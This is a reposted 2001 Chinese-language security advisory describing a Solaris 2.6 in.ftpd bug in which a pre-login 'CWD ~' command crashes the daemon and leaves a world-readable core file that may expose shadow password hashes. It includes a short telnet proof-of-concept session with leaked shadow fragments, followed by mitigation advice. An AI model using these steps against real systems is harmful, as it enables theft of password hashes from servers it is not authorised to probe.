[ 永远的UNIX > Solaris 2.6 IN.FTPD CWD 用户名猜测漏洞 ]

[ 永远的UNIX::UNIX技术资料的宝库 ]

首页 > 安全技术 > 系统 > 正文

Solaris 2.6 IN.FTPD CWD 用户名猜测漏洞

本文出自: 中国红客联盟 http://www.cnhonker.com (2001-06-01 09:04:00)

受影响的系统:
Solaris 2.6/2.5以及更低版本 (SPARC, x86)
描述:
--------------------------------------------------------------------------------

Solaris 的in.ftpd在用户登陆前接收到一个'CWD ~'请求时，会将用户
的home目录拷贝到一个缓冲区中。然而用户没有登陆前，这个home指针
为空。这将造成一个段访问错误发生，ftpd会在系统根目录下产生一个
core文件。这个core文件中可能包含shadow文件的部分内容。

缺省情况下，在Solaris 2.6下，core文件是任何人可读的。
所以普通用户可以获取部分或者全部的用户口令密文。

在Solaris 7/8下，缺省core文件是其他人不可读取得，所以不会造成
安全问题。

<*来源：Johnny Cyberpunk (johncybpk@gmx.net) *>

测试程序：
--------------------------------------------------------------------------------

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

warning3 (warning3@nsfocus.com)提供了下列测试方法：

[root@ /usr/sbin]> telnet localhost 21
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 sun26 FTP server (SunOS 5.6) ready.
user warning3
331 Password required for warning3.
pass blahblah
530 Login incorrect.
CWD ~
530 Please login with USER and PASS.
Connection closed by foreign host.
[root@ /usr/sbin]> ls -l /core
-rw-r--r--   1 root     root      284304 Apr 16 10:20 /core
[root@ /usr/sbin]> strings /coremore
[...snip...]
lp:NP:6445::::::
P:64
eH::::
uucp:NP:6445:::
[...snip...]

--------------------------------------------------------------------------------
建议:

临时解决方法：

建议您禁止产生core或者通过设置umask使core文件不可读

厂商补丁：
暂无。

(http://www.fanqiang.com)     进入【UNIX论坛】

相关文章

Java源码：实现简单的FTP功能 (2002-01-03 08:10:00)
如何以Solaris架设FTP虚拟系统 (2001-11-01 08:00:01)
ProFtpd快速指南 (2001-10-20 09:05:00)
solaris下匿名FTP安装 (2001-10-02 10:00:00)
远程连接(telnet/ftp/rsh/ssh)作为root的用法和总结 (2001-09-02 13:05:00)
如何使用wu-ftp 2.x(site exec bug)来取得root权限 (2001-07-15 07:05:00)
proFTP中如何将用户限制在自己的home目录下？ (2001-07-09 22:09:22)
如何配置WU-FTP服务器 (2001-06-27 08:10:01)
wu-ftpd使用基础 (2001-06-27 07:00:00)
ftp将用户限制在自己目录下的方法 (2001-06-26 13:04:00)

===更多相关===

★ 樊强制作欢迎分享 ★